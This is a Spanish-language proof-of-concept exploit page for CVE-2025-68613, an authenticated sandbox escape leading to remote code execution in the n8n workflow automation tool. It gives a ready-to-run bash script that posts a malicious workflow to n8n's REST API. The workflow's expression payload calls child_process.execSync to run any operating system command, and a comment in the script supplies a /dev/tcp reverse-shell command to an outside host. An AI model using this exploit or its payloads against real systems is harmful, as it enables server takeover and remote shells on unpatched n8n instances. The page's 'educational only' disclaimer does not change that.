
Exploit de Prueba de Concepto para CVE-2025-68613: Ejecución Remota de Código Autenticada en n8n mediante Expression Injection
Ejecución Remota de Código Crítica (CVSS 9.9) en la Herramienta de Automatización de Flujos de Trabajo n8n
Prueba de Concepto – Solo para fines educativos e investigación de seguridad autorizada
Este código se proporciona ESTRICTAMENTE para fines educativos y pruebas de seguridad autorizadas en entornos de laboratorio controlados.
El uso no autorizado en sistemas de producción o cualquier sistema sin permiso explícito por escrito es ilegal y viola las leyes de uso indebido de computadoras y ciberseguridad en la mayoría de las jurisdicciones.
Úselo bajo su propio riesgo. El autor no es responsable por ningún uso indebido.
| Campo | Detalles |
|---|
| Título del Exploit | n8n Inyección de Expresiones Autenticada para Ejecución Remota de Código |
| CVE | CVE-2025-68613 |
| Fecha de Divulgación | 2025-12-25 |
| Autor | Mohammed Idrees Banyamer |
| País del Autor | Jordania |
| Contacto / Redes Sociales | Instagram: @banyamer_security |
| GitHub | mbanyamer |
| Proveedor | n8n.io |
| Repositorio del Software | github.com/n8n-io/n8n |
| Versiones Vulnerables | ≥ 0.211.0 < 1.120.4 |
| Versiones Parcheadas | 1.120.4, 1.121.1, 1.122.0 y superiores |
| Probado en | n8n 1.119.3 (Docker) |
| Tipo de Vulnerabilidad | Ejecución Remota de Código Autenticada mediante Escape del Sandbox de Expresiones |
| Puntuación CVSS | 9.9 (Crítica) |
Esta vulnerabilidad permite a un usuario autenticado crear o modificar flujos de trabajo utilizando expresiones maliciosas que eluden el sandbox de expresiones de n8n, resultando en la ejecución completa de comandos del sistema operativo con los privilegios del proceso n8n.
#!/bin/bash
# Exploit Title: n8n Authenticated Expression Injection RCE
# Date: 2025-12-25
# Author: Mohammed Idrees Banyamer
# Author Country: Jordan
# Instagram: @banyamer_security
# GitHub: https://github.com/mbanyamer
# Vendor Homepage: https://n8n.io
# Software Link: https://github.com/n8n-io/n8n
# Version: >=0.211.0 <1.120.4
# Tested on: n8n 1.119.3 (Docker)
# CVE : CVE-2025-68613
TARGET="http://localhost:5678" # ← Change to your target
API_KEY="your_n8n_api_key_here" # ← Insert valid API Key (or use Basic Auth / session)
CMD="id" # ← Test command
# Example reverse shell: "bash -i >& /dev/tcp/10.0.0.1/4444 0>&1"
PAYLOAD="{{ (function(){ return this.process.mainModule.require('child_process').execSync('${CMD}').toString() })() }}"
echo "[*] Sending malicious workflow to ${TARGET}"
curl -s -X POST "${TARGET}/rest/workflows" \
-H "Content-Type: application/json" \
-H "X-N8N-API-KEY: ${API_KEY}" \
-d '{
"name": "CVE-2025-68613 PoC",
"active": false,
"nodes": [
{
"parameters": {
"values": {
"string": [
{
"name": "result",
"value": "'${PAYLOAD}'"
}
]
}
},
"name": "Exploit",
"type": "n8n-nodes-base.set",
"typeVersion": 1,
"position": [460, 300]
}
],
"connections": {}
}'
echo -e "\n[!] Check n8n logs or the output node in the created workflow for command result\n"